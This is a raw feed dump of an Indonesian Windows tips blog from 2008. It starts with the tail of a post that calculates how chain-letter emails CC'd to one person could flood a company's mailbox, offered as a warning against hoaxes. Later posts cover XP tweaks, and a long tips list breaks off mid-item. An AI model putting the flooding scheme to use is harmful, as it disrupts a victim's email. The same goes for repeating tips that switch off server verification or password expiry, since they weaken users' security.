A'''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |&lt;br /&gt;  |-&gt; A'  --&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |-&gt; A'&lt;br /&gt;  |-&gt; A'&lt;br /&gt;  |-&gt; A'&lt;br /&gt;  |-&gt; A'&lt;br /&gt;  |-&gt; A'&lt;br /&gt;  |-&gt; A'&lt;br /&gt;  |-&gt; A'&lt;br /&gt;  |-&gt; A'&lt;br /&gt;&lt;br /&gt;Dengan hitungan kasar:&lt;br /&gt;     A' -&gt; A'' = 10 x 1 = 10 --&gt; CC ke INBOX B&lt;br /&gt;     A'' -&gt; A''' = 10 x 10 = 100 --&gt; CC ke INBOX B&lt;br /&gt;     A''' -&gt; A'''' -&gt; 10 x 10 x 10 = 1000 --&gt; CC ke INBOX B&lt;br /&gt;                   &lt;br /&gt;Sampai sini bisa kita hitung:&lt;br /&gt;Total EMail yang di-CC ke B = 10+100+1000=1110&lt;br /&gt;Total Size yang di-CC ke B = 1110x100Kb= 111.000Kb&lt;br /&gt;                          = 111Mb&lt;br /&gt;&lt;br /&gt;111 Mb email (sampah) masuk ke INBOX B!!&lt;br /&gt;Belum lagi apabila A'''' memforward ke masing-masing 10 teman lagi dan seterusnya. Mungkin tidak hanya 10 teman, bukankah semakin banyak memforward akan semakin besar kemungkinan Ford Focus ada di garasi kita? Ok saya mempunyai 100 daftar kontak mulai dari teman SD, SMP, SMA, teman kuliah sampai teman kantor, saya pasti akan memforward ke mereka semua. Katakan tingkat keberhasilan (yang memforward lagi) ada 25%, maka 25 dari mereka akan melakukan hal yang sama ke daftar kontak mereka. Dan BUMMM!!&lt;br /&gt;&lt;br /&gt;Apabila kapasitas mailserver B hanya 100MB maka hancurlah Perusahaan XYZ, karena Mailbox nya dipenuhi oleh Sampah hasil balas dendam si A. Mengingat semua transaksi yang masuk hanya melalui email si B, maka email yang masuk akan segera mengalami BOUNCE (dikirim balik ke pengirim) karena mailbox sudah penuh (overload). Dalam beberapa bulan saja Perusahaan XYZ gulung tikar karena tidak ada transaksi sama sekali.&lt;br /&gt;&lt;br /&gt;Yang dapat kita petik dari sepenggal kisah di atas yaitu kita jangan mudah tertipu oleh email yang menawarkan iming-iming uang, diskon belanja, hadiah mobil, dll yang pada dasarnya hanyalah usaha untuk melakukan Flooding ke Mailbox sesorang yang telah menjadi target.&lt;br /&gt;&lt;br /&gt;Penulis tidak bertanggung jawab atas segala sesuatu yang timbul akibat artikel ini, karena tulisan ini hanya ditujukan untuk pembelajaran etika dalam ber-email.&lt;br /&gt;Salam.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-4381975835577750623?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/4381975835577750623/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=4381975835577750623' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/4381975835577750623'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/4381975835577750623'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/email-technique.html' title='Email Technique'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-7832032910134057438</id><published>2008-03-24T21:35:00.000-07:00</published><updated>2008-03-25T13:50:00.737-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>MENCARI DAN MEMPERBAIKI FILE SYSTEM YANG RUSAK</title><content type='html'>&lt;p class="MsoNormal" style="margin: 0cm 6.75pt 0.0001pt; text-align: justify; line-height: 200%;"&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  lang="DE" &gt;Komputer sering hang, atau aplikasi-aplikasi sering tidak dapat berjalan optimal?? &lt;/span&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  &gt;Salah satu penyebabnya bisa jadi karena ada file system yang rusak pada windows anda. &lt;/span&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  lang="DE" &gt;Berikut ini langkah-langkah untuk mengetahui adanya kerusakan file system tersebut. &lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 6.75pt 0.0001pt 42.75pt; text-align: justify; text-indent: -18pt; line-height: 200%;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  &gt;&lt;span style=""&gt;1.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  &gt;Klik [start][programs][accessories][system tools][system information] &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 6.75pt 0.0001pt 42.75pt; text-align: justify; text-indent: -18pt; line-height: 200%;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  &gt;&lt;span style=""&gt;2.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  &gt;Klik menu [tools][system file checker] lalu klik opsi [scan for altered files] kemudian klik [start]. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 6.75pt 0.0001pt 42.75pt; text-align: justify; text-indent: -18pt; line-height: 200%;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  &gt;&lt;span style=""&gt;3.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  lang="DE" &gt;Tunggu beberapa saat hingga proses scan selesai. Jika ditemukan file system yang rusak, maka anda akan dipandu untuk memperbaikinya.&lt;/span&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  &gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-7832032910134057438?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/7832032910134057438/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=7832032910134057438' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7832032910134057438'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7832032910134057438'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/mencari-dan-memperbaiki-file-system.html' title='MENCARI DAN MEMPERBAIKI FILE SYSTEM YANG RUSAK'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-8461961642322794057</id><published>2008-03-24T21:29:00.000-07:00</published><updated>2008-03-24T21:32:18.662-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Mempercepat booting Win-XP</title><content type='html'>&lt;span style="font-size: 9.5pt; font-family: &amp;quot;Times New Roman&amp;quot;; color: rgb(51, 51, 51);"&gt;Pertama nemu tutorial ini jadi penasaran gimana hasilnya, eh pas dicoba ternyata boljug. Habis... suka kesel juga sih sewaktu nungguin login page yang lama ngilang Argh&lt;br /&gt;&lt;br /&gt;Ikutin aja cara ini:&lt;br /&gt;&lt;br /&gt;1. Buka aplikasi Notepad (C:\WINDOWS\NOTEPAD.exe).&lt;br /&gt;2. Ketik: "&lt;st1:place st="on"&gt;&lt;st1:state st="on"&gt;del&lt;/st1:State&gt;&lt;/st1:place&gt; c:\windows\prefetch\ntosboot-*.* /q" (tanpa tanda kutip) lalu save as dengan nama file "ntosboot.bat" ke dalam C:\.&lt;br /&gt;&lt;br /&gt;3. Dari START menu, jalankan "Run..." dan ketik "gpedit.msc".&lt;br /&gt;&lt;br /&gt;4. Setelah muncul kotak Group Policy, di kotak sebelah kiri bagian Computer Configuration klik dua kali Windows Settings lalu klik lagi pilihan Scripts (Startup/Shutdown). Lalu, di kotak sebelah kanan klik dua kali "Shutdown".&lt;br /&gt;&lt;br /&gt;5. Pada kotak Shutdown Properties, klik "Add...", "Browse..." pada kotak "Script Name:". Cari lokasi file yang tadi di save di "C:\ntosboot.bat", klik Open -&gt; OK -&gt; Apply -&gt; OK lagi dan keluar.&lt;br /&gt;&lt;br /&gt;6. Dari START menu, jalankan "Run..." dan ketik "devmgmt.msc".&lt;br /&gt;&lt;br /&gt;7. Klik dua kali "IDE ATA/ATAPI controllers".&lt;br /&gt;&lt;br /&gt;8. Klik kanan "Primary IDE Channel" dan pilih "Properties".&lt;br /&gt;&lt;br /&gt;9. Setelah muncul kotak "Primary IDE Channel Properties"pindah ke tab "Advanced Settings". Pada "Device Type" di bagian "Device 1" ganti pilihan "Auto Detection" menjadi "None", klik OK.&lt;br /&gt;&lt;br /&gt;10. Klik kanan pada "Secondary IDE Channel", pilih "Properties" dan ulangi lagi langkah 9.&lt;br /&gt;&lt;br /&gt;11. Reboot/restart komputer Anda.&lt;br /&gt; &lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt; &lt;!--[endif]--&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-8461961642322794057?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/8461961642322794057/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=8461961642322794057' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/8461961642322794057'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/8461961642322794057'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/mempercepat-booting-win-xp.html' title='Mempercepat booting Win-XP'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-7315007311994683873</id><published>2008-03-24T21:12:00.000-07:00</published><updated>2008-03-25T05:59:53.535-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>150 tips dan trik dasar Windows</title><content type='html'>150 tips dan trik dasar Windows&lt;br /&gt;&lt;br /&gt;Setelah menginstalasi Windows dan aplikasi-aplikasi lain yang dibutuhkan ke dalam komputer, ada beberapa hal yang seharusnya Anda lakukan. Di antaranya adalah melakukan beberapa hal untuk mempercepat serta mempermudah kinerja komputer. Misalnya, mengatur agar komputer bisa restart lebih cepat, atau memunculkan menu tersembunyi, menggunakan shortcut untuk akses lebih cepat dan lain sebagainya.&lt;br /&gt;Semua hal di atas adalah sebagian kecil dari tip dan trik dasar Windows yang kami sampaikan berikut ini. Semua tip dan trik di sini kami padukan menjadi 150 langkah mudah dan aman untuk dilakukan. 150 tip dan trik, termasuk beberapa panduan langkah demi langkah yang mudah berikut ini, akan menjadikan komputer Anda lebih nyaman bekerja. Tentu saja, akhirnya, produktivitas Anda di depan komputer kian berkembang.&lt;br /&gt;Sebuah komputer yang nyaman saja belum cukup tanpa dibarengi peningkatan sisi keamanan. Hal ini penting, sebab koneksi ke jaringan, Internet maupun ke komputer lain, sedikit banyak pasti berisiko. Mulai dari penyebaran virus hingga pengambilan data kita oleh orang yang tidak berhak. Untuk itu, kami sertakan pula beberapa tip dasar untuk memperbaiki keamanan pada Windows.&lt;br /&gt;Beberapa tip dan trik maupun panduan langkah demi langkah dalam tulisan ini menggunakan bantuan program tertentu yang bisa di-download dari beberapa situs di Internet. Namun untuk memudahkan Anda, seperti biasa semua program yang disebutkan dalam tulisan berikut ini disertakan dalam CD PC Media. Tentu saja, semua program sudah diuji di labs PC Media.&lt;br /&gt;Instalasi program yang ada dalam tulisan ini kebanyakan berasal dari situs resmi Microsoft. Sehingga kecil kemungkinannya program-program ini menyebabkan error di PC. Jadi jangan ragu, ikuti terus tip dan trik dasar pada Windows yang jarang terungkap!&lt;br /&gt;Instalasi Windows yang Mudah dan Menyenangkan&lt;br /&gt;01. Back-up dahulu registry sebelum diedit. Caranya, klik Start|Run, ketik regedit. Setelah muncul window registry, pilih menu File|Export. Pada bagian Export range, pilih All dan tentukan nama file, akhiri dengan klik tombol Save.&lt;br /&gt;02. Banyak program yang sebenarnya terinstalasi dalam Windows, namun tidak aktif. Untuk mengaktifkannya, masuk ke Control Panel|Add/Remove Windows Component dan beri tanda centang pada program yang belum aktif.&lt;br /&gt;03. Sebelum menginstalasi program baru atau melakukan perubahan setting Windows secara keseluruhan, lebih baik buat Restore Point secara manual dahulu. Caranya, Klik Start|All Programs|Accessories|System Tool|System Restore dan klik Create a restore point.&lt;br /&gt;04. Jika Anda memutuskan untuk menginstalasi Windows Update yang sebelumnya sudah didecline, masuk ke Control Panel|System, pilih tab Automatic Updates dan klik Restore Declined Updates.&lt;br /&gt;05. Untuk mengatur Windows update berjalan sesuai dengan kebutuhan Anda, atur dulu Windows Update. Caranya, buka System di Control Panel dan klik tab Automatic Updates. Atur enable atau disable option Keep my computer up to date.&lt;br /&gt;06. Bila Anda tidak memiliki CD bootable, jangan khawatir. Microsoft sudah menyediakan tool gratis untuk membuat disket booting di http://support.microsoft.com/?kbid=310994.&lt;br /&gt;07. Jika saat instalasi Windows tiba-tiba terhenti, matikan komputer dan lepas card tambahan. Misalnya sound card. Instal ulang dan pasang kembali card setelah instalasi selesai.&lt;br /&gt;08. Untuk menambahkan System Administration Tools ada Start Menu, klik kanan Start|Properties. Masuk dalam tab Start Menu dan klik Customize kemudian masuk dalam tab Advanced. Geser ke bawah dan beri tanda centang pada option Display on the All Programs and the Start Menu.&lt;br /&gt;09. Untuk menginstal Back up Utility pada Windows XP Home Edition carilah file ntbackup.msi di direktori\valudeadd\msft\ntbackup\ di CD instalasi Windows XP. Jalankan file tersebut dan ikuti langkahlangkahnya.&lt;br /&gt;10. Windows XP secara otomatis akan me-highlight setiap program baru yang ter-install. Cara menghilangkannya, klik kanan Start|Properties. Masuk ke tab Start Menu|Customize, kemudian klik tab Advanced dan hilangkan tanda centang pada opsi Highlight newly installed program.&lt;br /&gt;11. Untuk tampilan film atau game terbaik pada komputer, pastikan bahwa DirextX terbaru sudah terinstalasi dengan baik. Lihat versi terbarunya di www.microsoft.com/windows/directx.&lt;br /&gt;12. Ada kalanya hardware yang akan dipasang belum support Plug-and-Play. Untuk itu, gunakan Add Hardware Wizard yang ada di Control Panel|System|Hardware untuk mendeteksinya.&lt;br /&gt;--&gt; TOP TIPS ! Mempercepat Kerja Komputer 13. Sebenarnya hanya dibutuhkan waktu tidak lebih dari 2 menit saja untuk masuk ke Windows sejak komputer dihidupkan. Namun, kadang terasa sangat lama. Untuk mempercepat loading Windows, ada beberapa hal yang bisa dilakukan. Misalnya, mengurangi icon di desktop serta tidak menggunakan wallpaper yang memakan banyak memory. Ganti wallpaper dengan background berwarna, serta gunakan Desktop Cleanup&lt;br /&gt;Wizard yang ada bisa ditemui dengan klik kanan pada desktop untuk membersihkan icon. Jangan lupa juga, jalankan defrag secara berkala.&lt;br /&gt;Jika Anda sering menambah atau mengurangi program di komputer, bersihkan registry secara rutin. Gunakan software bantu seperti Registry Mechanic dari situs www.winguides.com. Sayangnya, versi trial program ini hanya bisa digunakan memperbaiki sebanyak 6 sections saja.&lt;br /&gt;Langkah lain yang perlu dilakukan adalah me-remove program yang di-load secara otomatis saat memulai Windows. Tentu saja, hanya program-program yang tidak dibutuhkan. Caranya, dengan menghapus semua isi folder startup dan membuka msconfig melalui Start|Run.&lt;br /&gt;14. Gunakan fitur File and Transfer Setting Wizard untuk memindahkan file dan setting ke komputer baru. Caranya, klik Start|AllPrograms|Accessories|System Tools, kemudian jalankan File and Transfer Setting Wizard.&lt;br /&gt;15. Gunakan pengecualian pada security setting di Internet Explorer, agar proses update melalui halaman Windows Update berjalan lancar. Caranya, buka Internet Option di menu Tools pada Internet Explorer. Klik tab Security, pilih Trusted Site dan klik tombol Sites. Isikan nama situs Windows Update, hilangkan tanda centang pada option Require server verification… dan klik OK.&lt;br /&gt;16. Jika Anda kehilangan serial number Windows XP, gunakan freeware Magical Jelly Bean Keyfinder dari http://www.magicaljellybean.com/keyfinder.shtml.&lt;br /&gt;17. Jika nama yang teregister dalam Windows XP Anda tidak sesuai, perbaiki melalui registry. Caranya, buka registry dan pilih MY Computer. Klik menu Edit|Find dan ketik RegOwner. Jika sudah ditemukan, klik kanan, pilih Modify dan isikan nama yang sesuai. Perubahan ini bisa juga dilakukan di key RegCompany.&lt;br /&gt;Peningkatan Performa Internet dan Jaringan&lt;br /&gt;18. Untuk men-share sebuah folder di komputer Anda ke jaringan, klik kanan folder tersebut dan pilih Properties. Klik tab Sharing dan enable option Share this folder on the network. Beri nama dan klik OK.&lt;br /&gt;19. Buat sebuah icon My Network Places di desktop dengan mengklik kanan area kosong di dekstop dan klik Properties. Pilih tab Desktop|Customize Desktop. Kemudian buka tab General dan enable option My Network Places.&lt;br /&gt;20. Ada cara mudah mengirim pesan ke komputer lain di jaringan, yakni menggunakan Console Message. Buka Control Panel|AdministrativeTools|Computer Management|Action|All Task|Send Console Message. Ketik teks yang hendak dikirim, tambahkan nama komputer yang hendak dituju dan klik Send.&lt;br /&gt;21. Untuk mengatur Internet Connection Firewall (ICF), buka Network Connection di Control Panel, klik kanan koneksi yang ada dan klik Properties. Buka tab Advanced dan enable option Protect my computer and network by limitting or preventing access to this computer from Internet.&lt;br /&gt;22. Atur Internet Connection Firewall (ICF) untuk setiap koneksi yang ada. Baik dial-up maupun broadband. Jika komputer Anda merupakan bagian dari jaringan yang terhubung ke Internet, pasang ICF hanya di komputer server.&lt;br /&gt;23. Untuk mengetahui alamat IP Anda, masuk dalam DOS dengan mengetikkan command di Run. Kemudian ketikkan ipconfig /all.&lt;br /&gt;24. Jika Anda menerima pesan dari Internet melalui Messenger, segera matikan. Caranya, masuk ke Contol Panel|Administrative Tools|Services, dan klik ganda Messenger kemudian Stop. Untuk mencegah supaya tidak terulang, atur supaya Messenger menjadi Disabled di bagian Startup.&lt;br /&gt;25. Matikan Windows Messenger dengan melalui regedit. Buka HKEY_LOCAL_MACHINE\Software\Policies\Microsoft, kemudian pilih menu Edit|New|Key, dan beri nama Messenger. Kemudian buat key lagi dengan cara ini di dalam direktori Messenger dengan nama key-nya Client. Setelah itu, klik menu Edit|New|DWORD Value, dan beri nama Prevent-Run. Klik kanan value PreventRun, pilih Modify, isi angka 1 pada Value data, dan klik OK.&lt;br /&gt;26. Untuk mengetahui informasi mengenai koneksi di komputer Anda, klik Start|All Programs|Accessories|System Tools|System Information. Pilih menu Tools|Net Diagnostics. Pada window yang terbuka kemudian pilih option Scan your system. Tunggu hingga proses selesai untuk melihat hasilnya.&lt;br /&gt;27. Lindungi privasi dengan mencegah aplikasi Windows Media Player mengirim data mengenai komputer dan kebiasaan Anda menggunakan komputer melalui Internet ke alamat-alamat tertentu. Caranya mudah, Pada Windows Media Player, pilih menu Tools|Option. Buka tab Player dan disable option Aloww internet sites to uniquely your player.&lt;br /&gt;28. Untuk mengunci komputer yang berada dalam sebuah network domain, tekan tombol Ctrl + Alt + Del bersamaan dan klik option Lock Computer. Untuk membuka kembali, tekan tombol Ctrl + Alt + Deldan masukkan password. Konfigurasi Windows yang Mudah dan Cepat.&lt;br /&gt;29. Untuk men-disable fitur autorun, klik kanan pada icon drive CD, pilih Properties dan masuk dalam tab AutoPlay. Kemudian disable autoplay untuk setiap jenis file yang tertera pada daftar.&lt;br /&gt;30. Gunakan program Microsoft Clear Type Tuning Control dari http://www.microsoft.com/typography/cleartype/ untuk mengatur Clear Type pada komputer.&lt;br /&gt;31. Untuk melihat system file yang secara default di-hidden oleh Windows XP, pilih tab View dalam menu Tool|Folder Option dalam Windows Explorer. Enable Display the content of system folder.&lt;br /&gt;32. Untuk meletakkan icon volume control di taskbar, masuk dalam Control Panel|Sound and Audio dan klik tab Volume. Enable Place volume control in the Taskbar dan klik OK.&lt;br /&gt;33. Atur tombol Power di keyboard melalui Control Panel|Power Option di tab Advanced. Tentukan pengaturan tombol Power ini dengan memilih option yang tersedia.&lt;br /&gt;34. Atur supaya Windows membersihkan Pagefile saat shut down demi keamanan. Caranya, buka registry dan masuk dalam direktori HKEY_LOCALMACHINE\SYSTEM\CurrentControlSet\Control|Session Manager. Edit value pada key Clear-PageFileAtShutdown menjadi 1. Konsekuensinya, proses shut down akan berlangsung sedikit lebih lama.&lt;br /&gt;35. Atur supaya Windows menampilkan ekstensi setiap file. Caranya, di Windows Explorer, pilih menu Tool|Folder Option dan tab View. Hilangkan tanda centang di option Hide file extentions for known file types.&lt;br /&gt;--&gt; STEP BY STEP&lt;br /&gt;36. Menghapus Komponen yang Terinstal Banyak komponen Windows yang tidak muncul di Add/Remove Windows Component sehingga tidak bisa di-uninstall.&lt;br /&gt;1. Buka Notepad dan pilih menu File|Open. Arahkan ke folder Windows\inf. Isi nama file sysoc.inf. Klik Open untuk membuka file ini.&lt;br /&gt;2. Pilih menu Edit|Replace. Ketik Hide pada kolom Find, namun kosongkan kolom Replace With, klik Replace All. Tujuannya untuk menghapus semua kata Hide dalam file ini. Setelah selesai, tutup dan simpan file.&lt;br /&gt;3. Buka Control Panel dan pilih Add/Remove Programs. Kemudian pilih Add/Remove Windows Component, pada windows yang keluar kemudian akan tampak beberapa komponen yang sebelumnya tersembunyi.&lt;br /&gt;37. Ubah gambar pada welcome screen dengan cara masuk ke User Account di Control Panel. Buka account Anda dan klik Change my picture. Tentukan gambar pilihan Anda dengan mengklik Browse untuk gambar di harddisk atau memilih di antara gambar yang sudah tersedia.&lt;br /&gt;38. Jika lebih menyukai tampilan Start Menu versi lama, Anda bisa mengubahnya dengan mengklik kanan tombol Start, pilih Properties. Pilih Classic Start Menu dan klik Customize untuk mengatur isinya.&lt;br /&gt;39. Untuk menyempurnakan tampilan klasik pada Start Menu, klik kanan desktop dan pilih Properties. Buka tab Themes, dan pilih Windows Classic dari Theme list.&lt;br /&gt;40. Tambahkan image pada sebuah folder, sehingga image tersebut yang akan tampak saat Windows Explorer dalam tampilan thumbnails. Caranya, klik kanan folder yang hendak diolah, pilih Properties. Klik tab Customize dan klik Choose Picture. Pilih sebuah gambar dan klik Open|OK.&lt;br /&gt;41. Sesuaikan kapasitas Recycle Bin dengan mengklik kanan icon Recycle Bin dan memilih Properties. Isi kapasitas yang Anda inginkan dan klik OK.&lt;br /&gt;42. Pada saat View di-set Details di Windows Explorer, klik kanan header salah satu kolom untukmengatur kolom apa saja yang ditampilkan. Klik More bila perlu mengatur setting lainnya.&lt;br /&gt;43. Untuk menambahkan program yang paling sering Anda gunakan dalam Quick Launch, drag icon program tersebut dalam Quick Launch.&lt;br /&gt;44. Tambahkan address bar pada taskbar, sehingga mempercepat akses ke sebuah alamat di Internet. Caranya, klik kanan taskbar, pilih Toolbar|Address. Klik ganda untuk membuka dan menutupnya.&lt;br /&gt;45. Jadikan tampilan Windows Explorer seperti tampilan pada window My Computer. Caranya, klik kanan icon Window Explorer dan pilih Properties. Pada Target area, setelah %SystemRoot%\explorer.exe tambahkan /n, /e, /select, C:\ dan klik OK.&lt;br /&gt;46. Untuk menambahkan sebuah shortcut program di baris paling atas Start Menu, klik kanan icon-nya di Start Menu kemudian klik Pin to Start Menu. 47. Supaya sebuah drive atau folder dapat masuk dalam menu Send To, drag shortcut-nya ke folder \Documen Anda Setting\\SendTo.&lt;br /&gt;48. Mencari folder SendTo? Klik saja Start|Run dan ketik SendTo kemudian klik OK.&lt;br /&gt;49. Untuk mengosongkan daftar dokumen dalam folder My Recent Document di Start Menu, klik kanan Start, pilih Properties. Klik Customize dan buka tab Advanced kemudian klik tombol Clear list. Supaya tidak ada lagi yang muncul di My Recent Documents, disable option List my most recently opened documents.&lt;br /&gt;--&gt; STEP BY STEP 50. Fast User Switching Dengan Fast User Switching, seorang user tidak perlu logoff sementara user lain login.&lt;br /&gt;1. Untuk meng-enable Fast User Switching, masuk dalam Control Panel dan pilih User Accounts. Klik option Change the way user log on or off, dan enable Use Fast User Switching.&lt;br /&gt;2. Supaya koneksi dial-up tetap berjalan meski Fast User Switching di-enable, masuk ke registry di direktori HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon.&lt;br /&gt;3. Klik kanan pada panel sebelah kanan dan pilih New |String Value. Beri nama KeepRasConnections dan beri nilai 1. Restart komputer.&lt;br /&gt;51. Untuk melihat isi sesungguhnya folder My Recent Documents, klik Start|Run, kemudian ketikkan %UserProfile%\Recent.&lt;br /&gt;Pengaturan Multiple User 52. Untuk berpindah antar user account, tekan tombol Ctrl+Alt+Del, kemudian pada window Task Manager yang terbuka, pilih tab Users. Klik kanan nama user yang hendak dipakai dan klik tombol Connect.&lt;br /&gt;53. Tambahkan account Guest supaya orang lain bisa menggunakan komputer Anda. Caranya, buka User Accounts di Control Panel, klik Guest|Turn On the Guest Account.&lt;br /&gt;54. Ingatlah untuk selalu login sebagai System Administrator sebelum melakukan perubahan yang berimbas pada performa komputer.&lt;br /&gt;55. Untuk meng-copy user profile, masuk dalam Control Panel|System. Masuk dalam tab Advance dan klik tombol Setting di User Profiles. Sorot profile yang hendak dicopy, kemudian klik Copy to dan tentukan lokasi penyimpanan profile. Untuk mengubah permission, klik tombol Change.&lt;br /&gt;56. Ganti Welcome screen dengan login dialog untuk menambah tingkat keamanan. Caranya, masuk dalam User Accounts di Control Panel, pilih option Change the way user log on or off serta disable Welcome screen.&lt;br /&gt;57. Gunakan folder Shared Documents untuk menyimpan filefile yang bisa dibuka orang lain dalam jaringan. Folder ini bisa ditemui di My Documents\Other Places area.&lt;br /&gt;58. Pada Windows XP Pro Edition, password bisa kadaluarsa jika lama tidak digunakan login. Untuk menghindarinya, atur supaya Windows tidak melakukan hal tersebut. Caranya, klik Start|Run, ketikkan userpasswords2 dan Enter. Buka tab Advanced dan pilih Advanced user management, klik tombol Advanced dan pilih Local Users and&lt;br /&gt;Groups. Klik kanan nama user dan pilih Properties. Buka tab General dan enable option Password never expires.&lt;br /&gt;59. Beri nama setiap partisi atau drive yang ada dengan nama yang berbeda. Hal ini penting untuk mempermudah pencarian file. 60. Buat sebuah password reset disk sebagai disket darurat saat kehilangan password. Caranya, masuk ke Control Panel dan buka User Account. Pilih account Anda dan pilih Prevent a forgotten password untuk memulai wizard.&lt;br /&gt;Pengaturan File dan Folder 61. Buat sebuah compressed folder dengan cara mengklik kanan area kosong pada desktop, dan pilih New|Compressed (zipped) Folder. Beri nama dan drag and drop file yang hendak dikompres dalam folder tersebut.&lt;br /&gt;62. Sebuah compressed folder bisa dilindungi dengan password. Caranya, buka menu File|Add a Password. Isikan password Anda dan isi sekali lagi untuk konfirmasi.&lt;br /&gt;63. Sebuah compressed folder tetap bisa ditambah isinya dengan cara drag and drop file yang hendak dikompres ke dalamnya.&lt;br /&gt;64. Saat menjalankan Disk Cleanup, pilih option Compress old files untuk mengompresi file-file yang sudah tidak dibutuhkan, sehingga kapasitas harddisk bisa dihemat.&lt;br /&gt;65. Enkrip atau acak file bisa dilakukan di Windows XP Pro Edition dengan mengklik kanan My 